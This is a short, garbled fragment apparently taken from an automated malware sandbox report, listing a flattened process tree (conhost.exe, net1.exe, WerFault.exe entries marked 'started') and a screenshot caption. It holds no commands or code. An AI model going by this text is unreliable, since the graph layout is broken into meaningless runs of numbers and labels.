Module 50->146 74 4 other processes 54->74 64 conhost.exe 56->64         started        66 conhost.exe 56->66         started        68 net1.exe 1 58->68         started        70 conhost.exe 58->70         started        76 3 other processes 58->76 signatures14 process15 process16 78 WerFault.exe 60->78         started       

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.